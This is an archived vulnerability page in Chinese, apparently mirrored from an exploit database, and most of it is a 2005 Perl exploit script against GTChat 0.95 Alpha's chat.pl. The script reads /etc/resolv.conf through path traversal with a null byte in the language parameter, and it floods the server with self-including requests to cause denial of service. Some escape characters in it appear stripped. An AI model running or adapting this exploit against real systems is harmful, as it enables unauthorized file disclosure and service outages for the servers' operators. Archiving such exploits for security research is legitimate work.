GTChat 0.95 Alpha – Remote Denial of Service

GTChat 0.95 Alpha – Remote Denial of Service

漏洞ID 1055341 漏洞类型
发布时间 2005-08-18 更新时间 2005-08-18
图片[1]-GTChat 0.95 Alpha – Remote Denial of Service-安全小百科CVE编号 N/A
图片[2]-GTChat 0.95 Alpha – Remote Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 CGI CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1157
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl  

 use LWP::Simple;
    
 if (@ARGV < 3) 
{ 
    print "nUsage: $0 [server] [path] [mode] [count for DoS]n"; 
    print "sever -  URL chatn"; 
    print "path  -  path to chat.pln"; 
    print "mode  -  poc or dos,n"; 
    print "                    poc - simple check without DoS and exit,n"; 
    print "                    dos - DoS, you must set count for requests in 4 argument.nn";
    exit (); 
}   
    $DoS      =     "dos";
    $POC      =     "poc"; 
    $server   =  $ARGV[0]; 
    $path     =  $ARGV[1]; 
    $mode     =  $ARGV[2]; 
    $count    =  $ARGV[3];
    print qq(
                                           ###################################
                                           # GTChat <= 0.95 Alpha remote DoS #
                                           #   tested on GTChat 0.95 Alpha   #
                                           # (c)oded by x97Rang 2005 RST/GHC #
                                           #    Respect: b1f, 1dt.w0lf, ed   #
                                           ################################### );
 if ($mode eq $POC)
{  
    print "nnTry read file /etc/resolv.conf, maybe remote system unix...n";
    $URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0nHost: %snAccept:*/*nConnection:closenn",$server,$path,$server);  
    $content = get "$URL";
 if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/) 
{   print "File read successfully, remote system is *nix and $server are VULNERABLE!n"; exit(); }
 if ($content =~ /Fatal error/)
{ 
    print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:n"; 
    print "=== OUTPUT ===============================================================================n"; 
    print "n$contentn"; 
    print "=============================================================================== OUTPUT ===n";
    exit();
}
 else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)n"; }
}
 if ($mode eq $DoS)
{
 if (!($count)) { print "nNeed count for DoS requests, you don't set it, exit...n"; exit() }
    print "nSend $count DoS requests to $server...n";
   $URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0nHost: %snAccept:*/*nConnection:closenn",$server,$path,$server);
 for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }
    print "Done, packets sended.n";
}

# milw0rm.com [2005-08-18]

相关推荐: PHPWebSite User Module HTTP Response Splitting Vulnerability

PHPWebSite User Module HTTP Response Splitting Vulnerability 漏洞ID 1097665 漏洞类型 Input Validation Error 发布时间 2004-11-04 更新时间 2004-11…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享